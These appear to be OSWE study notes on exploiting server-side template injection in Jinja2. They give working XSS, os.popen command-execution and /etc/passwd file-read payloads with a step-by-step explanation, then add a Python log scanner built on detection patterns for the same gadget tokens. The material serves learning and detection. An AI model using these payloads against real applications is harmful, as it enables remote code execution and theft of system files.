OSWE Everything

Exploitation

Exploiting the SSTI

You can exploit SSTI in the following way:

Cross Site Scripting

{{ "<script>alert('XSS')</script>" }}
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('echo \"<script>alert(1)</script>\"').read() }}

Remote Code Execution

In this example we focus on exploiting SSTI in the Jinja2 templating engine (Python) in order to gain code execution.

One of the exploits that can enable us to perform code execution can be found below:

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

It looks a little complicated, but everything should become clear after a quick explanation of the code above.

'' # creates an empty string object
.__class__ # returns the class the string belongs to (<class 'str'>)

Once the class is returned, the payload uses the MRO attribute (Method Resolution Order): a tuple of the classes Python searches, in order, when resolving a method, which reflects the class's inheritance chain.

.__mro__ # lists the classes in the inheritance chain
.__mro__[2]
# accessing the class at the top of the hierarchy, which gives us access
# to as many useful classes as possible
# in our case it is <class 'object'>
# (index 2 is the last element on Python 2, where the tuple is
# (str, basestring, object); on Python 3 the tuple is only (str, object))

Once we have a useful class that we can take advantage of, we can proceed to choosing useful subclasses:

.__subclasses__() # lists the classes that inherit from the chosen class (in our case: <class 'object'>)
.__subclasses__()[40]
# the index depends on the interpreter build; in our case it is <type 'file'>
# (Python 2), whose constructor can be used to read files on the system

Running the useful function which results in reading the /etc/passwd file:

('/etc/passwd').read()
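
As an added defensive counterpart (not part of the original page): the gadget-chain pieces explained above double as a detection signature. This stdlib-only Python script URL-decodes the request target from access-log lines and flags requests that combine template delimiters with those Jinja2 internals; the log lines and hosts are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Tokens taken from the Jinja2 payloads discussed above. Template delimiters
# combined with these Python internals practically never occur in legitimate traffic.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%")
GADGET_TOKENS = (
    "__class__", "__mro__", "__subclasses__", "__globals__", "__init__",
    "_TemplateReference__context", "cycler", "popen", "/etc/passwd",
)
# Request line inside a Common Log Format entry: "METHOD TARGET HTTP/x.y"
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_target(target: str) -> str:
    """URL-decode until stable so double-encoded payloads become visible."""
    prev = None
    while prev != target:
        prev, target = target, unquote_plus(target)
    return target

def classify(line: str) -> dict:
    """Return the SSTI indicators found in one access-log line."""
    m = REQ_RE.search(line)
    if not m:
        return {"ssti": False, "tokens": [], "target": ""}
    target = decode_target(m.group("target"))
    tokens = [t for t in GADGET_TOKENS if t in target]
    has_delims = bool(TEMPLATE_DELIMS.search(target))
    # Delimiters alone ({{name}}) or dunders alone (/docs/__init__.py) are legitimate.
    return {"ssti": has_delims and bool(tokens), "tokens": tokens, "target": target}

def scan(log_lines):
    """Yield (line_no, tokens) for every line that looks like an SSTI attempt."""
    for i, line in enumerate(log_lines, 1):
        result = classify(line)
        if result["ssti"]:
            yield i, result["tokens"]

# Constructed sample log lines (hypothetical hosts, not from any real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?name=alice HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=%7B%7B%20%27%27.__class__.__mro__%5B2%5D.__subclasses__%28%29%5B40%5D%28%27/etc/passwd%27%29.read%28%29%20%7D%7D HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%257B%257B%2520self._TemplateReference__context.cycler.__init__.__globals__.os.popen%2520%257D%257D HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /docs/__init__.py HTTP/1.1" 404 0',
    '10.0.0.8 - - [01/Jan/2024:10:00:04 +0000] "GET /?q=%7B%7Bname%7D%7D HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for line_no, tokens in scan(SAMPLE_LOG):
        print(f"line {line_no}: SSTI indicators {tokens}")
```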